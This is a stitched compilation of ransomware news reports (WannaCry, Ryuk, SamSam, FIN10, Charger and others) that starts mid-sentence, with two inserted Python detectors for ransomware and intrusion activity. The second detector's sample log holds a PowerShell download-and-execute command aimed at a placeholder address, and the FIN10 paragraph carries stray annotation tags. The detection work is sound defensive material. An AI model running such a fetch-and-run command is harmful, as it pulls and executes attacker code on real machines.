, but existing antivirus software helped to slow down the attack, and the practice's IT vendor successfully removed the virus and all corrupt data from its servers. However, because hackers may have accessed portions of the practice's network, the pediatrics group is offering identity and credit protection services from Equifax Personal Solutions to all of its patients. The pediatrics group, which has four locations, posted a "HIPAA Notification" on its website regarding an incident that may have affected patients' protected health information (PHI). The practice stated that the notice was made in compliance with the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Prior to the attack, ABCD Pediatrics had a variety of security measures in place, including network filtering and security monitoring, intrusion detection systems, firewalls, antivirus software, and password protection, according to the organization's statement. On February 6, 2017, an employee of ABCD Pediatrics discovered that a virus had gained access and begun encrypting ABCD's servers. The encryption was slowed significantly by existing antivirus software. Upon discovery, ABCD immediately contacted its IT vendor, and ABCD's servers and computers were promptly moved offline and analyzed. The virus was identified as "Dharma Ransomware," which is a variant of an older ransomware virus called "CriSiS," according to the organization's IT vendor. "ABCD's IT company reported that these virus strains typically do not exfiltrate ("remove") data from the server; however, exfiltration could not be ruled out. Also, during the analysis of ABCD's servers and computers, suspicious user accounts were discovered suggesting that hackers may have accessed portions of ABCD's network," the organization stated.
The IT vendor successfully removed the virus and all corrupt data from its servers, and the practice said that secure backup data stored separately from its servers and computers was not compromised by the incident and was used to restore all affected data. According to the organization, no confidential information, including PHI, was lost or destroyed, and the practice group never received a ransom demand or other communications from unknown persons. In addition to notifying its patients, ABCD notified the FBI and the U.S. Department of Health and Human Services. According to the HHS Office of Civil Rights data breach portal, the incident affected 55,447 patients. While the IT vendor found no evidence that confidential information was actually acquired or removed from its servers and computers, it could not rule out the possibility that confidential information may have been viewed and possibly acquired, according to ABCD Pediatrics' statement. Affected information may have included patients' names, addresses, telephone numbers, dates of birth, Social Security numbers, insurance billing information, medical records, and laboratory reports. Following this incident, ABCD's IT vendor located the source of the intrusion and implemented additional security measures, including state-of-the-art cyber monitoring on its network, the organization said. In addition to the identity and credit protection services from Equifax, the pediatrics group recommended that patients also place a fraud alert on their credit files.
Three months on from the global WannaCry cyberattack, someone has withdrawn the funds acquired when victims paid ransoms. Almost three months on from the WannaCry ransomware outbreak, those behind the global cyberattack have finally cashed out their ransom payments. The WannaCry epidemic hit organisations around the world in May, with the file-encrypting malware, which used a leaked NSA exploit, attacking Windows systems. It infected over 300,000 PCs and crippled systems across the Americas, Europe, Russia, and China. The UK's National Health Service was particularly badly hit by the attack, with hospitals and doctors' surgeries knocked offline, and some services not restored until days after the ransomware hit. WannaCry continued to claim victims even after the initial outbreak: in June, Honda was forced to shut down a factory due to an infection, and speed cameras in Victoria, Australia, also fell victim to the ransomware. While the attack was certainly high profile, mistakes in the code meant many victims of WannaCry were able to successfully unlock systems without giving in to the demands of the hackers. A bot tracking ransom payments says only 338 victims paid the $300 bitcoin ransom demand, not exactly a large haul for an attack which infected hundreds of thousands of computers. In the months since the attack, the bitcoin wallets containing the money extorted by WannaCry were left untouched, but on August 3 they suddenly started to be emptied. At the time of withdrawal, the value of the wallets totalled $140,000 thanks to changes in the valuation of bitcoin.
Three separate withdrawals of between 7.3 bitcoin ($20,055) and 9.67 bitcoin ($26,435) were made in the space of a minute at 4:10am BST, accounting for around half of the total value of the extorted funds. Five minutes later, three more withdrawals of between seven bitcoin ($19,318) and 10 bitcoin ($27,514) were made in the space of another 60 seconds. Ten minutes later, a final withdrawal was made, emptying the remaining bitcoin from the WannaCry wallets. There's no official confirmation of who carried out the attack, but both private cybersecurity firms and investigating government agencies have pointed to North Korea as the culprit. A month after WannaCry, companies around the world found themselves being hit by another fast-spreading cyberattack in the form of Petya, which, like WannaCry, is still causing issues for some of those affected. Unfortunately, the success of the WannaCry and Petya infection rates means many cybercriminal groups are attempting to copy the worm-like features of these viruses for their own ends.
Ransomware authors are profiting from the rise of the cryptocurrency, but it's also bringing some unexpected problems for them and other dark web operators. The value of bitcoin has soared in recent days: at one point the cryptocurrency was worth almost $19,000 before it dropped back to around $16,500, where it has roughly remained since. It's almost impossible to predict what will happen next. The price of bitcoin could rise again or it could crash, but, for now at least, a single unit of the cryptocurrency is worth a significant amount of money. Bitcoin has become the popular payment method for ransomware over the last two years, as the digital currency provides cybercriminals with a means of collecting ransoms while also making it difficult to establish the ransom collectors' identities, thanks to the level of anonymity it offers. WannaCry, the biggest ransomware event of the year, for example, hit hundreds of thousands of PCs around the globe, encrypting files and demanding a payment of $300 in bitcoin for the safe return of what was stored on the machine. In this instance, the ransomware code itself was poorly written and the vast majority of victims were able to restore their systems without giving in to the demands of the cyber-attackers. However, by the time those behind WannaCry had withdrawn funds from the associated bitcoin wallets, a full three months after the attack, the 338 payments victims had made were worth around $140,000, an increase in value of just under $50,000 compared to when the majority of payments were made. If those behind WannaCry have held onto their illicit investment, they could now be sitting on over $1m of bitcoin. But the sudden spike in bitcoin could actually be problematic for some cybercriminals.
Before the surge in value, 1 or 0.5 bitcoin was a common ransom demand, with the idea that if the fee was low enough (back then the ransom value worked out at a few hundred dollars) this would encourage the victim to pay up. Even as the value of bitcoin steadily rose during the summer, some attackers were still using the standard amounts of cryptocurrency as their ransom demand. For example, Magniber ransomware demanded a payment of 0.2 bitcoin ($1,138 in mid-October), rising to 0.4 bitcoin ($2,275 in mid-October) if the payment wasn't received within five days. Two months later, 0.2 bitcoin is currently worth $3,312 while 0.4 bitcoin is up to $6,625. Many forms of ransomware already ask for the payment of a specified amount of dollars to be made in bitcoin. While this pins hopes on victims being able to buy a specific amount of bitcoin and successfully transfer the payment (which some criminal gangs get around by manning help desks providing advice on buying cryptocurrency), it's more likely to result in the victim paying up, especially if the figure is just a few hundred dollars. "I imagine the volatility of bitcoin pricing has been an unexpected problem for cybercriminals. The average ransom demand has remained somewhere between $300 to $1000, and normally the ransom note will specify a USD amount," Andy Norton, director of threat intelligence at Lastline, told ZDNet. It isn't just ransomware distributors who might be faced with the problem of valuing items in pure bitcoin: a dark web vendor, whether they are selling malware, weapons, drugs, or any other illegal item, might find that setting their price in pure bitcoin will quickly result in them pricing themselves out of the market.
With bitcoin prices continuing to rise, sophisticated cybercriminal operators can likely react to it, altering prices on a day-to-day basis to ensure that they're able to sustain their business. Criminals are already trying out alternative pricing models for ransomware. Some criminals already operate around the idea that they charge victims just enough so that they don't see the ransom as too much to pay, and that often depends on the country the victims are in. The Fatboy ransomware payment scheme charges victims in poorer countries less than those in richer ones. Meanwhile, those behind Scarab ransomware have started asking victims to suggest a payment amount for receiving the encryption key for their files.
Cryptojacking attacks exploded by 8,500% in 2017 as a result of the sudden increase in cryptocurrency values. According to research released by Symantec, the UK ranked as the fifth highest country worldwide, with a staggering 44,000% increase in coin-miner detections. With a low barrier to entry, requiring only a couple of lines of code to operate, cyber-criminals are harnessing stolen processing power and cloud CPU usage from consumers and enterprises to mine cryptocurrency. Coin-miners can slow devices, overheat batteries, and in some cases render devices unusable. For enterprise organizations, coin-miners can put corporate networks at risk of shutdown and inflate cloud CPU usage, adding cost. Symantec also found a 600% increase in overall IoT attacks in 2017, which means that cyber-criminals could exploit the connected nature of these devices to mine en masse. "Attackers could be co-opting your phone, computer or IoT device to use them for profit," said Darren Thomson, CTO and VP EMEA, Symantec. "People need to expand their defences or they will pay the price for someone else using their device." The Annual Threat Report also showed that while ransomware was still being used in 2017, there were fewer ransomware families and lower ransom demands. Symantec outlined in its report that "many cyber-criminals may have shifted their focus to coin mining as an alternative to cash in while cryptocurrency values are high" and that "some online banking threats have also experienced a renaissance as established ransomware groups have attempted to diversify." Last year, the average ransom demand dropped to $522, less than half the average of the year prior.
While the number of ransomware variants increased by 46%, indicating that the established criminal groups are still quite productive, the number of ransomware families dropped, suggesting they are innovating less and may have shifted their focus to new, higher value targets. The report analyzed data from the Symantec Global Intelligence Network, which tracks over 700,000 global adversaries, records events from 98 million attack sensors worldwide and monitors threat activities in over 157 countries and territories. Threats in the mobile space continued to grow year-over-year, including the number of new mobile malware variants, which increased by 54%. According to the report, Symantec blocked an average of 24,000 malicious mobile applications each day last year, citing older operating systems as one of the main causes: only 20% of devices are running the newest version of Android. Mobile users also face privacy risks from 'grayware' apps that aren't completely malicious but can be troublesome; Symantec found that 63% of grayware apps leak the device's phone number. Unfortunately, with grayware increasing by 20% in 2017, Symantec does not believe this problem will be going away.
A new ransomware strain named Ryuk is making the rounds, and, according to current reports, the group behind it has already made over $640,000 worth of Bitcoin. Attacks with this ransomware strain were first spotted last Monday, August 13, according to independent security researcher MalwareHunter, who first tweeted about this new threat. There have been several reports from victims regarding infections with Ryuk in the past week, including one on the Bleeping Computer forums. But despite these reports, security researchers from various companies have not been successful at identifying how this ransomware spreads and infects victims. The common train of thought is that this ransomware spreads via targeted attacks, with the Ryuk crew targeting selected companies one at a time, either via spear-phishing emails or Internet-exposed and poorly secured RDP connections, although researchers have not been able to pinpoint the exact entry vector for infections as of yet. "According to what we can see right now, it seems the attacks are targeted, i.e. a result of some manual compromise," Mark Lechtik, a Check Point security researcher, told Bleeping Computer in a private conversation today. "Reason for this is that the malware needs Admin privileges to run, which it doesn't achieve on its own. Something else that executes it had to achieve this privilege," he added. "But no artifact was found to show what spawned the execution of the malware (i.e. no mail, document, script etc.)."

Ryuk shuts down over 180 services on infected hosts

But there are also some differences. The main one, spotted by both Check Point and MalwareHunter, is that Ryuk comes with a huge list of apps and services it shuts down before infecting a victim's systems.
"The ransomware will kill more than 40 processes and stop more than 180 services by executing taskkill and net stop on a list of predefined service and process names," Check Point researchers explained in a report.

The ransom note conundrum

Furthermore, Ryuk's targeted nature is never more obvious than when it comes to its ransom notes. Check Point says it found several Ryuk samples where the ransomware dropped different ransom notes on users' systems. Researchers found a long, more verbose ransom note, and another, blunter and to-the-point ransom demand. Both ransom notes asked victims to contact the Ryuk authors via email. Coincidentally or not, the ransom fees demanded via the longer and more detailed ransom note were higher (50 Bitcoin, ~$320,000), compared to the shorter ransom note, where crooks asked for a smaller amount of money (15-35 Bitcoin, ~$224,000). "There seems to be some adaptation made in the ransom notes," Lechtik told Bleeping Computer, suggesting this particular detail adds to the assumption that Ryuk is deployed after hackers infect networks and not via mass email spam. "This could imply there may be two levels of offensive," Check Point said, suggesting that the Ryuk gang may also deploy different Ryuk samples based on the organization they manage to infect and its ability to pay higher ransom fees.

Ryuk not decryptable at the time of writing

As for the ransomware's encryption, this is a classic AES-RSA combo that's usually undecryptable unless the Ryuk team made mistakes in its implementation. Currently, researchers have not spotted such a weakness in Ryuk. Similar to most elite ransomware strains, unique Bitcoin payment addresses are created for each victim. Check Point says that money doesn't stay long in these addresses, and it is quickly split and laundered through different accounts.
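A defender-side detection for the process-kill and service-stop burst described above, as an added example that is not part of the original article or of Check Point's research. It scans process-creation events (Sysmon Event ID 1 / Security 4688 style) for a host that issues many taskkill or net stop commands inside a short window; the window size, the threshold, the event shape, and every host, user, process and service name below are constructed assumptions.

```python
"""Flag hosts that issue a burst of taskkill / net stop commands.

A pre-encryption sweep that kills dozens of processes and stops over a hundred
services in seconds is far denser than routine administration, so a per-host
sliding-window count is a cheap, explainable detection for it.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import ntpath
import shlex

WINDOW = timedelta(seconds=60)   # assumed sliding window
THRESHOLD = 10                   # assumed kill/stop commands per host in WINDOW


def classify(cmdline):
    """Return ("taskkill", target), ("net stop", target) or None for one command line."""
    try:
        argv = shlex.split(cmdline, posix=False)   # keep Windows backslashes intact
    except ValueError:
        return None
    if not argv:
        return None
    exe = ntpath.basename(argv[0].strip('"')).lower()
    if exe in ("taskkill", "taskkill.exe"):
        # target is the value following /IM (image name) or /PID
        for i, tok in enumerate(argv[1:-1], start=1):
            if tok.upper() in ("/IM", "/PID"):
                return ("taskkill", argv[i + 1].strip('"').lower())
        return ("taskkill", "?")
    if exe in ("net", "net.exe", "net1", "net1.exe") and len(argv) >= 3 \
            and argv[1].lower() == "stop":
        return ("net stop", argv[2].strip('"').lower())
    return None


def detect_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """events: iterable of (iso_timestamp, host, user, cmdline).

    Returns one alert per host whose densest window holds >= threshold
    kill/stop commands, with counts and the distinct targets in that window.
    """
    recent = defaultdict(deque)   # host -> rows (ts, user, kind, target) inside window
    best = {}                     # host -> rows of the densest window seen
    for ts_str, host, user, cmdline in sorted(events, key=lambda e: e[0]):
        hit = classify(cmdline)
        if hit is None:
            continue
        ts = datetime.fromisoformat(ts_str)
        q = recent[host]
        q.append((ts, user, hit[0], hit[1]))
        while ts - q[0][0] > window:
            q.popleft()
        if host not in best or len(q) > len(best[host]):
            best[host] = list(q)
    alerts = []
    for host, rows in sorted(best.items()):
        if len(rows) < threshold:
            continue
        alerts.append({
            "host": host,
            "users": sorted({r[1] for r in rows}),
            "window_start": rows[0][0].isoformat(),
            "window_end": rows[-1][0].isoformat(),
            "taskkill": sum(1 for r in rows if r[2] == "taskkill"),
            "net_stop": sum(1 for r in rows if r[2] == "net stop"),
            "targets": sorted({r[3] for r in rows}),
        })
    return alerts


def build_sample_events():
    """Constructed process-creation events, not real telemetry: (iso_ts, host, user, cmdline)."""
    base = datetime(2018, 8, 13, 9, 0, 0)
    sys_user = "NT AUTHORITY\\SYSTEM"
    ev = [  # HOST-A: an administrator restarting one service; not a burst
        (base.isoformat(), "HOST-A", "CORP\\it-admin", "net stop spooler"),
        ((base + timedelta(seconds=5)).isoformat(), "HOST-A", "CORP\\it-admin", "net start spooler"),
    ]
    procs = ["sqlservr.exe", "outlook.exe", "excel.exe", "winword.exe",
             "mysqld.exe", "firefox.exe", "chrome.exe"]
    svcs = ["MSSQLSERVER", "SQLWriter", "VSS", "wuauserv", "MSExchangeIS",
            "BackupAgent", "AVEngine"]
    t = base + timedelta(minutes=30)   # HOST-B: 7 taskkill + 7 net stop inside 30 s
    for i, p in enumerate(procs):
        ev.append(((t + timedelta(seconds=2 * i)).isoformat(), "HOST-B", sys_user,
                   f'"C:\\Windows\\System32\\taskkill.exe" /IM {p} /F'))
    for i, s in enumerate(svcs):
        ev.append(((t + timedelta(seconds=15 + 2 * i)).isoformat(), "HOST-B", sys_user,
                   f"net stop {s} /y"))
    for i, s in enumerate(svcs + svcs):   # HOST-C: same commands spread over an hour
        ev.append(((base + timedelta(minutes=5 * i)).isoformat(), "HOST-C",
                   "CORP\\it-admin", f"net stop {s}"))
    return ev


if __name__ == "__main__":
    for alert in detect_bursts(build_sample_events()):
        print(alert)
```

On the constructed sample only HOST-B alerts; HOST-C runs the same commands but spread over an hour, which is why the window, not the command list alone, carries the signal.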
While previous versions of the Hermes ransomware have been an on-and-off threat that surfaces at random intervals with a mass spam campaign , the new Ryuk ransomware strain appears to be a new attempt from the Lazarus Group at developing a SamSam-like strain to use in precise surgical strikes against selected organizations .
The Colorado Department of Transportation (DOT) has shut down over 2,000 computers after some systems got infected with the SamSam ransomware on Wednesday, February 21. The agency's IT staff is working with its antivirus provider McAfee to remediate affected workstations and safeguard other endpoints before reintroducing PCs into its network. DOT officials told local press [1, 2] that crucial systems were not affected, such as those managing road surveillance cameras, traffic alerts, message boards, and others. The agency's Twitter feed continued to show traffic alerts after the agency shut down much of its employees' IT network.

Colorado DOT will not pay the ransom

In a rare sign of transparency, officials revealed the name of the ransomware: SamSam. This is the same ransomware strain that infected hospitals, city councils, and ICS firms in January. The hackers made over $300,000 from those attacks. One of the victims, an Indiana hospital, agreed to pay a $55,000 ransom demand despite having backups. Hospital officials said it was easier and faster to pay the ransom than to restore all its computers' data from backups. DOT officials said they don't intend to follow suit by paying the ransom demand and will restore from backups.

SamSam ransomware making a comeback

The SamSam ransomware is a ransomware strain that's been deployed by a single group. Infection occurs after attackers gain access to a company's internal networks by brute-forcing RDP connections. Attackers then try to gain access to as many computers on the same network as possible, on which they manually run the SamSam ransomware to encrypt files. In the recent campaigns, SamSam operators usually asked for a 1 Bitcoin ransom and left a message of "I'm sorry" on victims' computers.
The SamSam group had previously been active in the winter of 2016 but has come back with new attacks. These new attacks have been detailed in reports published by Bleeping Computer, Secureworks, and Cisco Talos.
East Ohio Regional Hospital in Harper's Ferry, Ohio, and Ohio Valley Medical Center in Wheeling, West Virginia, were both affected by ransomware on the last weekend of November. [1] Due to this incident, ambulance patients were transported to other hospitals nearby and emergency room admissions were limited to walk-up patients only. Due to the attack, employees needed to switch to paper charting and various systems were taken offline immediately. This fairly quick response limited the ransomware damage and prevented a possible data breach. [2] According to Karin Janiszewski, director of marketing and public relations for EORH and OVMC, the hospitals reacted as soon as possible and, at the moment of writing, they are already using the computer network again. On the following Saturday, Karin Janiszewski stated: "There has been no patient information breach. The hospitals are switching to paper charting to ensure patient data protection. We have redundant security, so the attack was able to get through the first layer but not the second layer."

IT staff dealt with the outbreak to avoid a data breach

When it comes to malware attacks on large companies, the loss of personal customer data is the worst thing that can happen. It seems that this time the situation was handled quickly enough to prevent the sensitive data from being compromised. The IT team took several computers offline, and, because of this, most of the clinical operations were transferred to other units, and emergency patients were automatically taken to different locations. On Saturday, when the incidents occurred, hospital officials stated that the staff was ready to take everything on paper until the downtime is over. Also, since this is a ransomware-type malware attack, the hackers demand a ransom. However, officials did not select the scenario involving making the payment.
No matter how big or how small the ransom demand is, officials shouldn't even consider making the payment, because it may lead to system damage or permanent data loss. [3] In the United States, data breaches and malware attacks on huge organizations have become a common thing, especially in the healthcare industry. In 2016, Hollywood Presbyterian Hospital paid the demanded ransom in Bitcoin after having its data encrypted. [4] The infection was widespread and the attack cost around $17,000. Another incident that resulted in a ransom payment was spotted at Kansas Heart Hospital, also in 2016. Unfortunately, after the payment was made, the attackers disappeared, ignoring their promise to decrypt the locked files. They sent yet another ransom demand instead and asked for a bigger amount of money. Earlier this year, the Indiana-based hospital got infected with SamSam, an infamous ransomware virus which relies on specific, highly personalized infection tactics. After considering different scenarios, the hospital decided to pay 4 BTC (equal to $45,000 at that time) so that the ransomware developers would hand over the private keys needed for file recovery. The ransomware developers gave what they promised.
According to Fortinet researcher Kai Lu, who discovered this new threat, the ransomware appears to be targeting only Russian-speaking users, as its ransom note is only available in Russian. A translated version of the ransom note is available below. There are several things that stand out about this threat. The first is the humongous ransom demand it asks victims for, which is 545,000 Russian rubles (~$9,100). This ransom demand is between 10 and 100 times the price of some phones, and most users who can't remove the screen locker will instead choose to buy a new phone rather than pay the crooks. To pay the ransom, victims have to enter their credit card number directly in the ransom screen, a technique very different from how other ransomware operators like to work, which is via Bitcoin, Tor, or gift cards. The other thing that sets this ransomware apart is its use of the Google Cloud Messaging (GCM) platform, now renamed Firebase Cloud Messaging.
A group of financially motivated hackers is targeting networks and systems of North American companies , threatening to leak the stolen information and cripple the company by disrupting their networks if they don ’ t pay a hefty ransomAttack.Ransom. The group , dubbed FIN10 by FireEye researchers , first gets access to the target companies ’ systems through spear-phishingAttack.Phishing( and possibly other means ) , then uses publicly available software , scripts and techniques to gain a foothold into victims ’ networks . They use Meterpreter or the SplinterRAT to establish the initial foothold within victim environments ( and later a permanent backdoor ) , then custom PowerShell-based utilities , the pen-testing tool PowerShell Empire , and scheduled tasks to achieve persistence . “ We have also observed FIN10 using PowerShell to load Metasploit Meterpreter stagers into memory , ” the researchers noted . The group leverages Windows Remote Desktop Protocol ( RDP ) and single-factor protected VPN to access various systems within the environment . Finally , they deploy destructive batch scripts intended to delete critical system files and shutdown network systems , in order to disrupt the normal operations of those systems . “ In all but one targeted intrusion we have attributed to FIN10 , the attacker ( s ) demandedAttack.Ransoma variable sum payable in Bitcoin for the non-release of sensitive data obtained during network reconnaissance stages , ” the researchers say . They requested sum varies between 100 to 500 Bitcoin . If the ransom isn’t paidAttack.Ransom, they publish the stolen data on Pastebin-type sites . The researchers do not mention if any of the companies refused to payAttack.Ransomand ended up having their systems and networks disrupted . For the time being , the group seems to have concentrated on hitting companies in North America , predominately in Canada . They ’ ve also concentrated on two types of businesses : mining companies and casinos . 
Still, it's possible that they've targeted companies in other industries, or will do so in the future. FIN10 sends the extortion emails to staff and board members of the victim organizations, and is also known to contact bloggers and local journalists to inform them about the breach, likely in an attempt to pressure affected organizations into paying the ransom. Finally, even though they sign their emails with monikers used by Russian and Serbian hackers ("Angels_Of_Truth," "Tesla Team," "Anonymous Threat Agent"), the quality of the group's English, the low quality of their Russian, and inconsistencies in tradecraft all point away from these particular individuals or groups. "Emphasis in regional targeting of North American-based organizations could possibly suggest the attacker(s) familiarity with the region," the researchers noted. They also point out that the "relative degree of operational success enjoyed by FIN10 makes it highly probable the group will continue to conduct similar extortion-based campaigns at least in the near term." Companies that have received a similar ransom demand are advised to move fast to confirm that the breach has actually happened, to determine its scope, to contain the attack, to boot the attackers from their networks, and to make sure they can't come back. Those last two steps are, perhaps, better done after the company has definitely decided that it is ready to deal with the consequences of the attackers' anger. Calling in law enforcement and legal counsel for advice on what to do is also a good idea. "Understand that paying the ransom may be the right option, but there are no guarantees the attacker(s) won't come back for more money or simply leak the data anyway. Include experts in the decision-making process and understand the risks associated with all options," the researchers advise.
Companies that have yet to be targeted by these or other hackers would do well to improve their security posture, but also to prepare for data breaches by tightening access to their backup environment, and by knowing exactly who will be called in to help in case of a breach.
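The tradecraft attributed to FIN10 above (scheduled tasks launching PowerShell for persistence, PowerShell loading stagers into memory, and RDP logons inside the environment) maps onto events most Windows estates already collect. The following is an added example of detection logic run over constructed log lines; it is not FireEye's code nor anything from the article. It assumes a pipe-separated `key=value` export of the Windows Security log (a made-up layout, not a real SIEM schema) and an assumed allow-list of hosts from which RDP is expected; the event IDs themselves are the standard ones (4698 scheduled task created, 4688 process created, 4624 logon with LogonType 10 meaning RemoteInteractive, i.e. RDP).

```python
"""Detection of the FIN10-style persistence and access patterns described above.

Added example, not FireEye's or the article's code. The log lines below are
constructed for illustration, and the pipe-separated 'key=value' layout is an
assumed export format, not a real SIEM schema. The event IDs are the standard
Windows Security log IDs: 4698 (scheduled task created), 4688 (process
created) and 4624 (logon; LogonType 10 = RemoteInteractive, i.e. RDP).
"""
import re
from typing import Dict, List

# Constructed sample events (not from a real incident). Hosts, users and
# addresses are placeholders; 203.0.113.5 and 198.51.100.23 are documentation
# addresses.
SAMPLE_LOG = """\
EventID=4698|Host=FILESRV01|User=CORP\\svc_backup|TaskName=\\Microsoft\\Windows\\Updater|TaskContent=powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA
EventID=4688|Host=WS-ACCT07|User=CORP\\jdoe|NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"
EventID=4688|Host=WS-ACCT07|User=CORP\\jdoe|NewProcessName=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe C:\\Users\\jdoe\\notes.txt
EventID=4624|Host=DC01|User=CORP\\svc_backup|LogonType=10|IpAddress=198.51.100.23
EventID=4624|Host=DC01|User=CORP\\jdoe|LogonType=2|IpAddress=-
EventID=4698|Host=WS-ACCT07|User=CORP\\jdoe|TaskName=\\OneDriveSync|TaskContent=C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe /background
"""

# Sources from which interactive RDP is expected (assumed allow-list, e.g. a
# hardened jump host). Anything else is worth a look.
ALLOWED_RDP_SOURCES = {"10.0.0.5"}

# PowerShell flags and cradles typical of Empire/Metasploit stagers: encoded
# commands, hidden windows, and download-and-execute via IEX.
SUSPICIOUS_POWERSHELL = re.compile(
    r"-e(?:nc(?:odedcommand)?)?\b"
    r"|-w(?:indowstyle)?\s+hidden"
    r"|downloadstring"
    r"|\biex\b"
    r"|invoke-expression",
    re.IGNORECASE,
)


def parse_events(raw: str) -> List[Dict[str, str]]:
    """Turn pipe-separated key=value lines into dicts; blank lines are skipped."""
    events = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        fields = {}
        for part in line.split("|"):
            key, _, value = part.partition("=")  # split on the first '=' only
            fields[key] = value
        events.append(fields)
    return events


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply three rules derived from the reported FIN10 tradecraft."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == "4698":
            # Persistence: a scheduled task whose action launches PowerShell
            # with stager-like flags.
            action = ev.get("TaskContent", "")
            if "powershell" in action.lower() and SUSPICIOUS_POWERSHELL.search(action):
                alerts.append({"rule": "scheduled_task_powershell_persistence",
                               "host": ev["Host"], "detail": ev.get("TaskName", "")})
        elif eid == "4688":
            # In-memory loading: PowerShell started with an encoded command or
            # a download cradle.
            proc = ev.get("NewProcessName", "").lower()
            cmd = ev.get("CommandLine", "")
            if proc.endswith("powershell.exe") and SUSPICIOUS_POWERSHELL.search(cmd):
                alerts.append({"rule": "powershell_inmemory_loader",
                               "host": ev["Host"], "detail": cmd})
        elif eid == "4624" and ev.get("LogonType") == "10":
            # Internal access over RDP from a source outside the allow-list.
            src = ev.get("IpAddress", "")
            if src not in ALLOWED_RDP_SOURCES:
                alerts.append({"rule": "rdp_logon_unexpected_source",
                               "host": ev["Host"], "detail": f"{ev['User']} from {src}"})
    return alerts


if __name__ == "__main__":
    for a in detect(parse_events(SAMPLE_LOG)):
        print(f"[{a['rule']}] {a['host']}: {a['detail']}")
```

Run against the constructed sample, the three benign events (a notepad launch, a console logon, a OneDrive task) produce nothing and the three suspicious ones each raise one alert. The rules are deliberately narrow so they can be tuned: the PowerShell pattern will also fire on legitimate administration scripts that use `-EncodedCommand`, so in practice the scheduled-task rule is best paired with a baseline of known tasks, and the RDP rule with a real list of jump hosts rather than the placeholder used here.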
Researchers say a piece of ransomware disguised as a battery app made its way into the Play store. Check Point says one of its customers contracted the malware app, dubbed "Charger," after installing what they thought was a battery monitoring tool called EnergyRescue. Researchers with Check Point Mobile Threat Prevention say the malware activates when EnergyRescue runs, and requires admin access to the device. Once that permission is granted, the malware checks for location (it does not attack phones in Ukraine, Belarus, or Russia), then swipes all user contacts and SMS messages and locks down the device. From there, the user is told that they must pay to deactivate the ransomware or they will have their full details spaffed out for various nefarious activities, including bank fraud and spam. "You need to pay for us, otherwise we will sell portion of your personal information on black market every 30 minutes," the ransomware tells users. Not ones to be unprofessional, the Charger operators attempt to reassure their victims by offering a "100% guarantee" that once the 0.2 Bitcoin ransom (currently around $183) is paid, all the collected information will be deleted and the device unlocked. "The ransom demand for 0.2 Bitcoins is a much higher ransom demand than has been seen in mobile ransomware so far," note Check Point mobile security analysts Oren Koriat and Andrey Polkovnichenko. "By comparison, the DataLust ransomware demanded merely $15." Check Point says that thus far it has not spotted any payments being registered to the Bitcoin address used for the ransom collection, so it is unclear how much, if anything, has been made from this operation.